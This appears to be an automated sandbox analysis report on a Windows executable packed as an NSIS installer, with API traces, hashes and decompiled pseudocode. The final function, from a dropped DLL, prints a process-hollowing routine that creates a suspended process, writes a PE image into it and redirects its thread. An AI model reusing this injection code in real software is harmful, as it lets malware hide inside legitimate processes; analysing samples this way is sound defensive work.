                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\DN_467842234567.exe,00000400), ref: 00402C82
                                              • Part of subcall function 0040589E: GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\DN_467842234567.exe,80000000,00000003), ref: 004058A2
                                              • Part of subcall function 0040589E: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4
                                            • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DN_467842234567.exe,C:\Users\user\Desktop\DN_467842234567.exe,80000000,00000003), ref: 00402CCE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                            • String ID: ]_$"C:\Users\user\Desktop\DN_467842234567.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DN_467842234567.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$L^_$Null$soft
                                            • API String ID: 4283519449-672717380
                                            • Opcode ID: d7843f665ea2917adf3dcfe78593387cec42cc0a537a0d0ef4c304b969a704fe
                                            • Instruction ID: 196f3fd9364ed88bbd27218647615838fe3130e8ea263fbe41a0cbd6df82c613
                                            • Opcode Fuzzy Hash: d7843f665ea2917adf3dcfe78593387cec42cc0a537a0d0ef4c304b969a704fe
                                            • Instruction Fuzzy Hash: 6A510871941218ABDB609F66DE89B9E7BB8EF00314F10403BF904B62D1CBBC9D418B9D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00402E8E, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 174fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 95%
                                            			E00402E8E(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				signed int _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				char _v92;
				void* _t67;
				void* _t68;
				long _t74;
				intOrPtr _t79;
				long _t80;
				void* _t82;
				int _t84;
				intOrPtr _t95;
				void* _t97;
				void* _t100;
				long _t101;
				signed int _t102;
				long _t103;
				int _t104;
				intOrPtr _t105;
				long _t106;
				void* _t107;

				_t102 = _a16;
				_t97 = _a12;
				_v12 = _t102;
				if(_t97 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t97;
				if(_t97 == 0) {
					_v16 = 0x418c48;
				}
				_t65 = _a4;
				if(_a4 >= 0) {
					_t95 =  *0x42ec78; // 0xa1a0
					E004030E2(_t95 + _t65);
				}
				_t67 = E004030B0( &_a16, 4); // executed
				if(_t67 == 0) {
					L34:
					_push(0xfffffffd);
					goto L35;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t97 == 0) {
							while(_a16 > 0) {
								_t103 = _v12;
								if(_a16 < _t103) {
									_t103 = _a16;
								}
								if(E004030B0(0x414c48, _t103) == 0) {
									goto L34;
								} else {
									if(WriteFile(_a8, 0x414c48, _t103,  &_a12, 0) == 0 || _t103 != _a12) {
										L29:
										_push(0xfffffffe);
										L35:
										_pop(_t68);
										return _t68;
									} else {
										_v8 = _v8 + _t103;
										_a16 = _a16 - _t103;
										continue;
									}
								}
							}
							L45:
							return _v8;
						}
						if(_a16 < _t102) {
							_t102 = _a16;
						}
						if(E004030B0(_t97, _t102) != 0) {
							_v8 = _t102;
							goto L45;
						} else {
							goto L34;
						}
					}
					_t74 = GetTickCount();
					 *0x40b5ac =  *0x40b5ac & 0x00000000;
					 *0x40b5a8 =  *0x40b5a8 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t74;
					 *0x40b090 = 8;
					 *0x414c38 = 0x40cc30;
					 *0x414c34 = 0x40cc30;
					 *0x414c30 = 0x414c30;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L45;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t104 = 0x4000;
						if(_a16 < 0x4000) {
							_t104 = _a16;
						}
						if(E004030B0(0x414c48, _t104) == 0) {
							goto L34;
						}
						_a16 = _a16 - _t104;
						 *0x40b080 = 0x414c48;
						 *0x40b084 = _t104;
						while(1) {
							_t100 = _v16;
							 *0x40b088 = _t100;
							 *0x40b08c = _v12;
							_t79 = E00406034(0x40b080);
							_v28 = _t79;
							if(_t79 < 0) {
								break;
							}
							_t105 =  *0x40b088; // 0x41cc48
							_t106 = _t105 - _t100;
							_t80 = GetTickCount();
							_t101 = _t80;
							if(( *0x42ecd4 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t107 = _t107 + 0xc;
								E00404EB3(0,  &_v92);
								_v20 = _t101;
							}
							if(_t106 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L45;
							} else {
								if(_a12 != 0) {
									_t82 =  *0x40b088; // 0x41cc48
									_v8 = _v8 + _t106;
									_v12 = _v12 - _t106;
									_v16 = _t82;
									L24:
									if(_v28 != 1) {
										continue;
									}
									goto L45;
								}
								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
								if(_t84 == 0 || _v24 != _t106) {
									goto L29;
								} else {
									_v8 = _v8 + _t106;
									goto L24;
								}
							}
						}
						_push(0xfffffffc);
						goto L35;
					}
					goto L34;
				}
			}



























                                            0x00402e96
                                            0x00402e9a
                                            0x00402e9d
                                            0x00402ea2
                                            0x00402ea4
                                            0x00402ea4
                                            0x00402eab
                                            0x00402eaf
                                            0x00402eb4
                                            0x00402eb6
                                            0x00402eb6
                                            0x00402ebd
                                            0x00402ec2
                                            0x00402ec4
                                            0x00402ecd
                                            0x00402ecd
                                            0x00402ed8
                                            0x00402edf
                                            0x0040305b
                                            0x0040305b
                                            0x00000000
                                            0x00402ee5
                                            0x00402ee9
                                            0x00403046
                                            0x0040309b
                                            0x00403060
                                            0x00403066
                                            0x00403068
                                            0x00403068
                                            0x00403079
                                            0x00000000
                                            0x0040307b
                                            0x0040308e
                                            0x00403040
                                            0x00403040
                                            0x0040305d
                                            0x0040305d
                                            0x00000000
                                            0x00403095
                                            0x00403095
                                            0x00403098
                                            0x00000000
                                            0x00403098
                                            0x0040308e
                                            0x00403079
                                            0x004030a6
                                            0x00000000
                                            0x004030a6
                                            0x0040304b
                                            0x0040304d
                                            0x0040304d
                                            0x00403059
                                            0x004030a3
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00403059
                                            0x00402ef5
                                            0x00402ef7
                                            0x00402efe
                                            0x00402f05
                                            0x00402f05
                                            0x00402f0c
                                            0x00402f14
                                            0x00402f1e
                                            0x00402f23
                                            0x00402f2b
                                            0x00402f35
                                            0x00402f38
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00402f3e
                                            0x00402f3e
                                            0x00402f3e
                                            0x00402f46
                                            0x00402f48
                                            0x00402f48
                                            0x00402f59
                                            0x00000000
                                            0x00000000
                                            0x00402f5f
                                            0x00402f62
                                            0x00402f68
                                            0x00402f6e
                                            0x00402f6e
                                            0x00402f79
                                            0x00402f7f
                                            0x00402f84
                                            0x00402f8b
                                            0x00402f8e
                                            0x00000000
                                            0x00000000
                                            0x00402f94
                                            0x00402f9a
                                            0x00402f9c
                                            0x00402fa5
                                            0x00402fa7
                                            0x00402fd5
                                            0x00402fdb
                                            0x00402fe4
                                            0x00402fe9
                                            0x00402fe9
                                            0x00402ff0
                                            0x00403034
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00402ff2
                                            0x00402ff5
                                            0x00403017
                                            0x0040301c
                                            0x0040301f
                                            0x00403022
                                            0x00403025
                                            0x00403029
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040302f
                                            0x00403003
                                            0x0040300b
                                            0x00000000
                                            0x00403012
                                            0x00403012
                                            0x00000000
                                            0x00403012
                                            0x0040300b
                                            0x00402ff0
                                            0x0040303c
                                            0x00000000
                                            0x0040303c
                                            0x00000000
                                            0x00402f3e

                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00402EF5
                                            • GetTickCount.KERNEL32 ref: 00402F9C
                                            • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402FC5
                                            • wsprintfA.USER32 ref: 00402FD5
                                            • WriteFile.KERNELBASE(00000000,00000000,0041CC48,7FFFFFFF,00000000), ref: 00403003
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CountTick$FileWritewsprintf
                                            • String ID: ... %d%%$HLA$HLA
                                            • API String ID: 4209647438-295942573
                                            • Opcode ID: 2ed182f22c19ccbe5ebd44aa976ae303b5dd6c485202a0ec0c370d738780273e
                                            • Instruction ID: 15109c7e5c0d48913ae26536c30eb2ff4c12f072ab55fd5dd83b367320b2a29b
                                            • Opcode Fuzzy Hash: 2ed182f22c19ccbe5ebd44aa976ae303b5dd6c485202a0ec0c370d738780273e
                                            • Instruction Fuzzy Hash: 2C618E71902219DBDB10DF65EA44AAF7BB8EB04356F10417BF910B72C4D7789A40CBE9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00401751, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 73%
                                            			E00401751(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402A29(0x31);
				 *(_t85 - 0xc) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405727(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E004056BA(E00405BC7(0x409c40, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c40);
					E00405BC7();
				}
				E00405E29(0x409c40);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405EC2(0x409c40);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040587F(0x409c40);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040589E(0x409c40, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404EB3(0xffffffe2,  *(_t85 - 0xc));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42eca8;
						goto L32;
					} else {
						E00405BC7(0x40a440, 0x42f000);
						E00405BC7(0x42f000, 0x409c40);
						E00405BE9(_t75, 0x40a440, 0x409c40, "C:\Users\jones\AppData\Local\Temp\nslF1C.tmp\rcgwzvp.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00405BC7(0x42f000, 0x40a440);
						_t62 = E00405488("C:\Users\jones\AppData\Local\Temp\nslF1C.tmp\rcgwzvp.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42eca8 =  &( *0x42eca8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c40);
								_push(0xfffffffa);
								E00404EB3();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404EB3(0xffffffea,  *(_t85 - 0xc));
				 *0x42ecd4 =  *0x42ecd4 + 1;
				_t43 = E00402E8E( *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 8), _t75, _t75); // executed
				 *0x42ecd4 =  *0x42ecd4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 8)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405BE9(_t75, _t80, 0x409c40, 0x409c40, 0xffffffee);
					} else {
						E00405BE9(_t75, _t80, 0x409c40, 0x409c40, 0xffffffe9);
						lstrcatA(0x409c40,  *(_t85 - 0xc));
					}
					_push(0x200010);
					_push(0x409c40);
					E00405488();
					goto L29;
				}
				goto L33;
			}
















                                            0x00401751
                                            0x00401758
                                            0x00401761
                                            0x00401764
                                            0x00401767
                                            0x0040176c
                                            0x00401774
                                            0x00401790
                                            0x00401776
                                            0x00401776
                                            0x00401777
                                            0x00401777
                                            0x00401796
                                            0x004017a0
                                            0x004017a0
                                            0x004017a4
                                            0x004017a7
                                            0x004017ac
                                            0x004017ae
                                            0x004017b0
                                            0x004017b5
                                            0x004017b5
                                            0x004017c0
                                            0x004017c0
                                            0x004017d1
                                            0x004017d3
                                            0x004017d3
                                            0x004017d4
                                            0x004017d4
                                            0x004017d7
                                            0x004017da
                                            0x004017dd
                                            0x004017dd
                                            0x004017e4
                                            0x004017f3
                                            0x004017f8
                                            0x004017fb
                                            0x004017fe
                                            0x00000000
                                            0x00000000
                                            0x00401800
                                            0x00401803
                                            0x0040185d
                                            0x00401862
                                            0x004015a8
                                            0x0040268f
                                            0x0040268f
                                            0x004028be
                                            0x004028c1
                                            0x004028c1
                                            0x00000000
                                            0x00401805
                                            0x0040180b
                                            0x00401816
                                            0x00401823
                                            0x0040182e
                                            0x00401844
                                            0x00401844
                                            0x00401847
                                            0x00000000
                                            0x0040184d
                                            0x0040184d
                                            0x0040184e
                                            0x0040186b
                                            0x004028c7
                                            0x004028c7
                                            0x004028c7
                                            0x00401850
                                            0x00401850
                                            0x00401851
                                            0x00401492
                                            0x00402241
                                            0x00402241
                                            0x00402241
                                            0x0040184e
                                            0x00401847
                                            0x004028c9
                                            0x004028cd
                                            0x004028cd
                                            0x0040187b
                                            0x00401880
                                            0x0040188e
                                            0x00401893
                                            0x00401899
                                            0x0040189d
                                            0x0040189f
                                            0x004018a7
                                            0x004018b3
                                            0x004018a1
                                            0x004018a1
                                            0x004018a5
                                            0x00000000
                                            0x00000000
                                            0x004018a5
                                            0x004018bc
                                            0x004018c2
                                            0x004018c4
                                            0x00000000
                                            0x004018ca
                                            0x004018ca
                                            0x004018cd
                                            0x004018e5
                                            0x004018cf
                                            0x004018d2
                                            0x004018db
                                            0x004018db
                                            0x004018ea
                                            0x004018ef
                                            0x0040223c
                                            0x00000000
                                            0x0040223c
                                            0x00000000

                                            APIs
                                            • lstrcatA.KERNEL32(00000000,00000000,TclpOwkq,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401790
                                            • CompareFileTime.KERNEL32(-00000014,?,TclpOwkq,TclpOwkq,00000000,00000000,TclpOwkq,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BA
                                              • Part of subcall function 00405BC7: lstrcpynA.KERNEL32(?,?,00000400,004031D8,hyeatlxkvdhyymhha Setup,NSIS Error), ref: 00405BD4
                                              • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,0041CC48,73BCEA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                              • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041CC48,73BCEA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                              • Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041CC48,73BCEA30), ref: 00404F0F
                                              • Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                              • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F47
                                              • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F61
                                              • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F6F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                            • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nslF1C.tmp$C:\Users\user\AppData\Local\Temp\nslF1C.tmp\rcgwzvp.dll$TclpOwkq
                                            • API String ID: 1941528284-2283241589
                                            • Opcode ID: 95e67b310e6745b10a35ef5b552587608c142c3317b69d328c6358dc637ee1da
                                            • Instruction ID: c8ecff54efbd1983964958a71a4b78ec9a68474d29a8073c081a3edbe3f43163
                                            • Opcode Fuzzy Hash: 95e67b310e6745b10a35ef5b552587608c142c3317b69d328c6358dc637ee1da
                                            • Instruction Fuzzy Hash: 8541B631904514BBCB107BA6CC45DAF3678EF01329F60823BF521F11E1D63CAA419EAE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405375, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00405375(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x40735c;
				_v36.Group = 0x40735c;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x40734c;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                            0x00405380
                                            0x00405384
                                            0x00405387
                                            0x0040538d
                                            0x00405391
                                            0x00405395
                                            0x0040539d
                                            0x004053a4
                                            0x004053aa
                                            0x004053b1
                                            0x004053b8
                                            0x004053c0
                                            0x004053c2
                                            0x00000000
                                            0x004053c2
                                            0x004053cc
                                            0x004053d3
                                            0x004053e9
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004053eb
                                            0x004053ef

                                            APIs
                                            • CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 004053B8
                                            • GetLastError.KERNEL32 ref: 004053CC
                                            • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053E1
                                            • GetLastError.KERNEL32 ref: 004053EB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                            • String ID: C:\Users\user\Desktop$Ls@$\s@
                                            • API String ID: 3449924974-3927138272
                                            • Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                            • Instruction ID: 9862b429919ab471ad7b2dc8692991af43e8f75a2b46e14c68af8680499b7529
                                            • Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                            • Instruction Fuzzy Hash: 78010C71D14219DADF019BA0DC447EFBFB8EB04354F00453AE904B6180E3B89614CFA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 7291631F, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 237processthreadCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 29%
                                            			E7291631F(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void* _v20;
				char* _v24;
				intOrPtr _v28;
				char* _v32;
				intOrPtr _v36;
				void _v40;
				intOrPtr _v44;
				struct _PROCESS_INFORMATION _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				struct _STARTUPINFOW _v160;
				struct _CONTEXT _v876;
				short _v1916;
				void* _t155;
				void* _t161;
				intOrPtr _t162;
				void* _t165;
				signed int _t175;
				void* _t186;

				_v12 = E729159AF();
				_v68 = E72915A5E(_v12, 0xff7f721a);
				_v76 = E72915A5E(_v12, 0x7fe2736c);
				_v80 = E72915A5E(_v12, 0x7fa1f993);
				_v84 = E72915A5E(_v12, 0x7fa3ef6e);
				_v92 = E72915A5E(_v12, 0xff31bf16);
				_v72 = E72915A5E(_v12, 0x7fb6c905);
				_t228 = 0x7fb1f910;
				_v88 = E72915A5E(_v12, 0x7fb1f910);
				_v64 = _a4;
				_v8 = _a4 +  *((intOrPtr*)(_v64 + 0x3c));
				_t26 = ( *(_v8 + 0x14) & 0x0000ffff) + 0x18; // 0x18
				_v44 = _v8 + _t26;
				_v28 = 0x10;
				_v24 =  &_v60;
				while(_v28 != 0) {
					 *_v24 = 0;
					_v24 = _v24 + 1;
					_v28 = _v28 - 1;
				}
				_v36 = 0x44;
				_v32 =  &_v160;
				while(_v36 != 0) {
					 *_v32 = 0;
					_v32 = _v32 + 1;
					_v36 = _v36 - 1;
				}
				_v20 =  *(_v8 + 0x34);
				_push(0x103);
				_push( &_v1916);
				_push(0);
				if(_v68() != 0) {
					if(CreateProcessW( &_v1916, _v72(), 0, 0, 0, 0x8000004, 0, 0,  &_v160,  &_v60) != 0) {
						_v876.ContextFlags = 0x10007;
						if(GetThreadContext(_v60.hThread,  &_v876) != 0) {
							if(ReadProcessMemory(_v60.hProcess, _v876.Ebx + 8,  &_v40, 4, 0) != 0) {
								_t217 = _v40;
								if(_v40 <  *(_v8 + 0x34)) {
									L18:
									_v20 = VirtualAllocEx(_v60.hProcess,  *(_v8 + 0x34),  *(_v8 + 0x50), 0x3000, 0x40);
									if(_v20 != 0) {
										_push(0);
										_push( *((intOrPtr*)(_v8 + 0x54)));
										_push(_a4);
										_push(_v20);
										_push(_v60.hProcess);
										_t155 = E7291554F(_t217, _t228); // executed
										if(_t155 != 0) {
											_v16 = _v16 & 0x00000000;
											while(_v16 < ( *(_v8 + 6) & 0x0000ffff)) {
												_push(0);
												_push( *((intOrPtr*)(_v44 + 0x10 + _v16 * 0x28)));
												_push(_a4 +  *((intOrPtr*)(_v44 + 0x14 + _v16 * 0x28)));
												_t175 = _v16 * 0x28;
												_t217 = _v44;
												_t228 = _v20 +  *((intOrPtr*)(_t217 + _t175 + 0xc));
												_push(_v20 +  *((intOrPtr*)(_t217 + _t175 + 0xc)));
												_push(_v60.hProcess);
												E7291554F(_t217, _v20 +  *((intOrPtr*)(_t217 + _t175 + 0xc))); // executed
												_v16 = _v16 + 1;
											}
											_push(0);
											_push(4);
											_push( &_v20);
											_push(_v876.Ebx + 8);
											_push(_v60.hProcess);
											_t161 = E7291554F(_t217, _t228); // executed
											if(_t161 != 0) {
												_t162 = _v8;
												_t219 = _v20 +  *((intOrPtr*)(_t162 + 0x28));
												_v876.Eax = _v20 +  *((intOrPtr*)(_t162 + 0x28));
												if(SetThreadContext(_v60.hThread,  &_v876) != 0) {
													_t165 = E7291549E(_t219, _t228, _v60.hThread); // executed
													if(_t165 != 0) {
														return 0;
													}
													return 1;
												}
												return 1;
											}
											return 1;
										}
										return 1;
									}
									return 1;
								}
								_t217 = _v8;
								if(_v40 >  *(_v8 + 0x34) +  *(_v8 + 0x50)) {
									goto L18;
								}
								_t186 = E72915650(_t217, _t228, _v60, _v40); // executed
								if(_t186 == 0) {
									goto L18;
								}
								return 1;
							}
							return 1;
						}
						return 1;
					}
					return 1;
				}
				return 1;
			}































                                            0x7291632d
                                            0x7291633d
                                            0x7291634d
                                            0x7291635d
                                            0x7291636d
                                            0x7291637d
                                            0x7291638d
                                            0x72916390
                                            0x7291639d
                                            0x729163a3
                                            0x729163af
                                            0x729163bc
                                            0x729163c0
                                            0x729163c3
                                            0x729163cd
                                            0x729163d0
                                            0x729163d9
                                            0x729163e0
                                            0x729163e7
                                            0x729163e7
                                            0x729163ec
                                            0x729163f9
                                            0x729163fc
                                            0x72916405
                                            0x7291640c
                                            0x72916413
                                            0x72916413
                                            0x7291641e
                                            0x72916421
                                            0x7291642c
                                            0x7291642d
                                            0x72916434
                                            0x72916468
                                            0x72916472
                                            0x7291648b
                                            0x729164af
                                            0x729164bc
                                            0x729164c2
                                            0x729164ec
                                            0x72916505
                                            0x7291650c
                                            0x72916516
                                            0x7291651b
                                            0x7291651e
                                            0x72916521
                                            0x72916524
                                            0x72916527
                                            0x7291652e
                                            0x72916538
                                            0x72916545
                                            0x72916551
                                            0x7291655a
                                            0x7291656c
                                            0x7291656d
                                            0x72916571
                                            0x72916577
                                            0x7291657b
                                            0x7291657c
                                            0x7291657f
                                            0x72916542
                                            0x72916542
                                            0x72916586
                                            0x72916588
                                            0x7291658d
                                            0x72916597
                                            0x72916598
                                            0x7291659b
                                            0x729165a2
                                            0x729165a9
                                            0x729165af
                                            0x729165b2
                                            0x729165c7
                                            0x729165d1
                                            0x729165d8
                                            0x00000000
                                            0x729165df
                                            0x00000000
                                            0x729165dc
                                            0x00000000
                                            0x729165cb
                                            0x00000000
                                            0x729165a6
                                            0x00000000
                                            0x72916532
                                            0x00000000
                                            0x72916510
                                            0x729164ca
                                            0x729164d3
                                            0x00000000
                                            0x00000000
                                            0x729164db
                                            0x729164e2
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x729164e6
                                            0x00000000
                                            0x729164b3
                                            0x00000000
                                            0x7291648f
                                            0x00000000
                                            0x7291646c
                                            0x00000000

                                            APIs
                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 72916463
